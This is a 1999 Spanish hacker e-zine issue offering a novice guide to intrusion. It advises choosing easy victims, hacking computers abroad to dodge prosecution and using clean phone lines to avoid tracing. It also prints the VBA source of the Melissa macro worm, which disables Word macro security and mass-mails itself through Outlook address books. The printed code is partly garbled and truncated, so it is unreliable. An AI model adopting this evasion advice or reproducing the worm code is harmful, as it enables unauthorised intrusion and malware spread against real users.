7a69 nº2:(Ripe2.txt):04/10/1999 << Back To 7a69 nº 2
╔════════════════════════════╦═════════════════╦════════════════════════════╗ ║ ║ R|p3HacK Nº02 ║ ║ ║ ╚═════════════════╝ ║ ║ [ 07-5-99 ] ║ ║───────────────────────────────────────────────────────────────────────────║ ║ - GUIA PARA EL HACKER NOVATO - ║ ╚═════════════════════════════════════════════════════════════════╦═════════╣ Bajate cualquier numero de R|p3HACK en: ║ By Ripe ║ < http://www.geocities.com/fashionavenue/Stage/1500 > ╚═════════╝ ╔══════════════════════════════╦════════════════════╦═══════════════════════╗ ║ * ARTICULO * ║ * TEMA * ║ * NIVEL * ║ ║──────────────────────────────║────────────────────║───────────────────────║ ║1.- Presentacion ║ ║ ║ ║──────────────────────────────║────────────────────║───────────────────────║ ║2.- El grupo TNT ║ Grupo de Hack ║ ║ ║──────────────────────────────║────────────────────║───────────────────────║ ║3.- Diccionario de ayuda II ║ Hacking ║ Muy bajo ║ ║──────────────────────────────║────────────────────║───────────────────────║ ║4.- ¿Por donde epezar? ║ Hacking ║ Muy bajo ║ ║──────────────────────────────║────────────────────║───────────────────────║ ║5.- Informe del virus MELISSA ║ Viruses ║ Muy bajo ║ ║──────────────────────────────║────────────────────║───────────────────────║ ║6.- Despedida ║ ║ ║ ╚══════════════════════════════╩════════════════════╩═══════════════════════╝ ╔══════════════════════════════╦════════════════════╦═══════════════════════╗ ║ * ARTICULO * ║ * TEMA * ║ * NIVEL * ║ ║──────────────────────────────║────────────────────║───────────────────────║ ║1.- Presentacion ║ ║ ║ ╚══════════════════════════════╩════════════════════╩═══════════════════════╝ ¡¡Lo logre lector!! he conseguido sacar a la luz el 2º numero de la rebista R|p3HACK (mola). Por si alguien no ha leido el primer numero dire que soy Ripe, que formo parte del grupo de hack TNT (The Net Team) y que una de mis mayores aficiones es el hacking :) No he recibido demasiados mails (algunos si), cosa que en parte es logica, debido al poco tiempo que ha habido entre la salida de los dos numeros de la revista, asi que.... escribidme porfavor a ripe@mixmail.com (quejas, sugerencias, articulos, etc). Bueno quiza que empezemos; espero que os guste.... ╔══════════════════════════════╦════════════════════╦═══════════════════════╗ ║ * ARTICULO * ║ * TEMA * ║ * NIVEL * ║ ║──────────────────────────────║────────────────────║───────────────────────║ ║2.- El grupo TNT ║ Grupo de Hack ║ ║ ╚══════════════════════════════╩════════════════════╩═══════════════════════╝ Durante estos dias no ha pasado nada especial en The Net Team, asi que en esta seccion repetire lo mismo que en el numero 1 de la rebista :) The Net Team es un grupo de Hack formado hace casi tres meses por (no se si te has fijado pero aqui ha cambiado algo XD) Tincho. En el grupo por ahora hay unicamente 4 componentes (espero que en un futuro haya muchos mas y podamoa hacer algo grande). Esos 4 componentes citados somos Tincho, Aule, Cimos, y como no, yo :) Si quieres enviar un E-Mail al grupo escribe a thenetteam@mixmail.com, pero si quieres dirigirte aun componente en concreto (como podeis ver he añadido los mails que faltavan): ┌────────┬────────────────────┐ │ Tincho │ │ ├────────┼────────────────────┤ │ Aule │ │ ├────────┼────────────────────┤ │ Cimos │ │ ├────────┼────────────────────┤ │ Ripe │ ripe@mixmail.com │ └────────┴────────────────────┘ Para entrar en el grupo visita nuestra pagina web e informate (no se aceptan lamers <-----> Pequeño malentendido con esta palabra) http://come.to/Tincho ╔══════════════════════════════╦════════════════════╦═══════════════════════╗ ║ * ARTICULO * ║ * TEMA * ║ * NIVEL * ║ ║──────────────────────────────║────────────────────║───────────────────────║ ║3.- Diccionario de ayuda II ║ Hacking ║ Muy bajo ║ ╚══════════════════════════════╩════════════════════╩═══════════════════════╝ Creo que en el articulo anterior olvide algunos aspectos que pueden ser intresantes de saber, no son muchos por lo que realmente el articulo es corto (y que querias? un diccionario como el del numero anterior? XD). 1.- TELEFONO LIMPIO: Supongo que en articulo anterior ya adibinaste lo que era, pero si eres cortito (sin ofender) te lo explicare yo. Un telefono limpio es una linea telefonica que no tiene ninguna relacion contigo; para usar un telefono limpio hay varias opciones, desde ir aun cybercafe (ya lo dije) hasta pinchar la linea telefonica de alguien (esta ultima opcion no es recomendable, pues si te pillan la condena sera mucho mayor). 2.- LAMER: Persona que no tiene ningun interes en aprender a hackear, pero que utiliza medios para hacer creer a los demas que es 31137 (31337 = eleet = elite en frances; este termino se utiliza mucho, e incluso hay un troyano que afecta a ese puerto). Ultimamente (por error) se trata a los novatos que SI quieren aprender de lamers (¡pero tio! tu tambien empezaste asi), esto es debido que los hackers de la 31337 (XD) se cren que nacieron con un manual de UNIX bajo el brazo. Pido perdon a la gente que me ha escrito diciendo que se sentian ofendidos por la frase "no se aceptan lamers", pues yo no me referia a los novatos, que repito, SI quieren aprender. 3.- BOT: Programa que automatiza su tarea por si mismo, si algun dia veis un tal R|p3BOT por IRC es un bot programado por mi (para usarlo pon /ctcp R|p3BOT help). 4.- VIRUS: ¿Que no sabes lo que es? Bueno por si acaso te lo contare; el virus informatico no tiene nada que ver con el virus biologico (¿lo sabias? XD). Un virus informatico es un conjunto de instrucciones logicas que tienen como finalidad perjudicar el rendimiento de un sistema. En proximos articulos seguramente expandiremos un poco este tema. 5.- BICHO: Es un script maligno con finalidade de hack (comparable con los virus) ╔══════════════════════════════╦════════════════════╦═══════════════════════╗ ║ * ARTICULO * ║ * TEMA * ║ * NIVEL * ║ ║──────────────────────────────║────────────────────║───────────────────────║ ║4.- ¿Por donde empezar? ║ Hacking ║ Muy bajo ║ ╚══════════════════════════════╩════════════════════╩═══════════════════════╝ Despues de haber leido en este numero y el anterior algunos conceptos basicos sobre el hacking llega el momento de saber por donde empezar. Una de las primeras tareas de un hacker es encontrar a su victima. -Recomendaciones- 1.- La victima ha de ser facil de hackear, la facilidad o no de hackear un sistema no depende integramente de del sistema operativo PC, tambien depende de la experiencia y el nivel del administrador, asi pues un es posible que un UNIX de mas facilidades que un windows. 2.- Antes de de epezar a hackear a la victima debes informarte de todo lo que puedad (sistema operativo, nivel del administrador, tipo de red, etc). 3.- Procura no hackear nunca el ordenador de una compañia importante, pues ellos disponen de tiempo y dinero y con simple trazeo podrian localizarte si no usas un telefono limpio (¿ya sabes lo que es? XD). Si haces esto tu vida como hacker ha terminado (a no ser que te lleves el portatil a la celda XD). 4.- Es recomendable no hackear nunca ordenadores que esten en tu pais (en caso de que te pillen va a ser dificil que vengan a buscarte), ni ordenadores que esten en un pais con legislacion AntiHacker (me gusta llamarla asi). 5.- Yo recomandaria empezar a hackear ordenadore ilegales, como sitios warez o con pornografia infantil (¡Que asco!), ya que dudo que lleguen a meterse en temas legales (no se te ocurra hackear a la mafia rusa, las consecuencias podrian ser peores XD). 6.- Procura usar software apropiado, algunos programas (a la mierda Micro$oft) se dedican a identificarse atrabes de la red mediante cookies. 7.- Lo ideal para hackear seria utilizar un telefono limpio, ir a un cyber-caffe por ejemplo, aun que dudo que ahi tengan suficiente material para hackear :( Aqui termino este articulo, epero que te haya gustado, si no.... ya sabes ripe@mixmail.com (manifestaos ante mi XD). ╔══════════════════════════════╦════════════════════╦═══════════════════════╗ ║ * ARTICULO * ║ * TEMA * ║ * NIVEL * ║ ║──────────────────────────────║────────────────────║───────────────────────║ ║6.- Informe del virus MELISSA ║ Viruses ║ Muy Bajo ║ ╚══════════════════════════════╩════════════════════╩═══════════════════════╝ Como ya sabeis (por si acaso lo repito) un virus es un conjunto de intrucciones que el ordenador puede entender y que son porjudiciales para el mismo. Los virus tratan de ocultarse en la memoria del PC infectado hasta que se cumpla una condicion, sera entonces quando el virus entre en juego. Cada dia aparcen mas de 1000 virus en todo el mundo, ello conlleva a que muchas empresas de seguridad informatica se hayan dedicado a la creacion de antivirus. Pero este articulo no esta escrito para infomar a la gente de lo que es un virus, si no para dar a conocer (a quien no lo conozca) uno de los virus de los cuales se ha hablado mas ultimamente; el MELISSA. El virus MELISSA tiene sus instrucciones perjudiciales en forma de macro para Word97. La difusion de este virus ha sido tan rapida que la misma Micro$oft se ha visto obligada a desconectar su servidor de correo electronico con la intencion de evitar la propagacion del virus, ye que este se tranfiere via E-Mail. Se teme que en poco tiempo muchas empresas puedan tener caidas importantes. Segun tengo entendido el W97M/Melissa (nombre completo del virus) aparecio en un grupo de news alt.sex, en un documento llamado list.doc, que contenia password para paginas de alto contenido erotico. Al utilizar Micro$oft Word 97 para abrir este fichero, se ejecuta una macro que reenvia el fichero a los primeros 50 miembros de la agenda de contador del usuario. Al parecer lo envia junto a un mensage que dice lo siguiente: "Here is that document you asked for... don't show anyone else ;-)". Si se esta infectado por este virus se puede observar que en el momento que los minutos coincidan con el dia y el mesy se tenga abierto un documento, se auto escribira la siguiente frase: "Twenty-two points, plus trple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here" (esto puede parecer una tonteria, pero imaginate lo que puede suponerle a una empresa). Aun que el virus en si no hace nada mas, hay que tener en cuenta que envia una gran cantidad de mails, dando lugar a una sobrecarga en la red :( El virus MELISSA afecta a entorno windows y Machintosh ejecutando Word 97 (tambien con word 2000). Para que la propagacion del virus se cumpla debe estar instalado Micro$oft Outllook 97. -Precauciones- La verdad es que para evitar ser contagiado (y al mismo timpo la propagacion del virus, basta solo con con desactivar las opciones de macro en Word 97, y en Word 2000. Aun que el virus MELISSA no es altamente perjudicial se debe evitar su propagacion por la red de redes. -Codigo fuente- Por si hay algun curioso al que le interese el codigo fuente (espero que no sea para mal) del virus; aqui lo teneis :) Private sub Document_Open() On Error Resume Next If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsof \Office\ CommandBars("Macro").Controls("Security...").Enabled = False System.PrivateProfeleString("", "HKEY_CURRENT_USER\Software \Microsoft\Offive\9 Else CommandBars("Tools".Controls("Macro").Enabled =False Options.ConfirmConversions = (1-1): Options.VirusProtection = (1-1): Options End If Dim UngaDasOutlook, DasMapiName, BreakUmoffASlice Set UngaDasOutlook = CreateObject("Outlook.Application") Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI") If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft \Office\ If UngaDasOutlook = "Outlook" Then DasMapiName.Logon "profile", "password" For y = 1 To DasMapiName.AddressList.count Set AddyBook = DasMapiName.AddressList(y) x = 1 Set BreakUmoffASlice = UngaDasOutlook.CreateItem(0) For oo = 1 To AddyBook.AddressEntries.Count Peep = AddyBook.AddressEntries(x) ReakUmoffASlice.Recipients.Add peep x = x+1 If x > 50 Then oo = AddyBook.AddressEntries.Count Next oo BreakUmoffASlice.subject = "Important Mesage from" & Appliication.User BreakUmoffASlice.Body = "Here is that document you asked for... dont't BreakUmoffASlice.Attachments.Add ActiveDocument.FullName BreakUmoffASlice.send Peep = "" Next y DasMapiName.Logoff End If System.PrivarteProfileString("", HKEY_CURRENT_USER\Software \Microsoft\Office\" End If ╔══════════════════════════════╦════════════════════╦═══════════════════════╗ ║ * ARTICULO * ║ * TEMA * ║ * NIVEL * ║ ║──────────────────────────────║────────────────────║───────────────────────║ ║6.- Despedida ║ ║ ║ ╚══════════════════════════════╩════════════════════╩═══════════════════════╝ Bueno lector, este segundo numero ha salido mas pronto de lo que tenia prebisto por lo que el tercer numero de R|p3HACK tardara seguramente algo mas. Pero no os desanimeis y seguid lellendo, que en la red hay un monton de informacion. A ver si os animais a enviarme informacion de crack, virus, y phreak (para novatillos como yo), que no llega nada :( Espero que en proximos numeros de la rebista se incluyan mas articulos, pero todo depende de vosotros. Gracias a todos los que me habeis mandado un mail (aun que seais muy pocos), desde aqui un saludo. Tambien saludo a los miembros del TNT (casi se me olvida XD). Adiooooooos.... %%% % %% % % % %%%% % % %% %%% % % %%%% % % %% % % % % % % % %%%%% % % % % % % % % %%% %%%% %%%%% % % %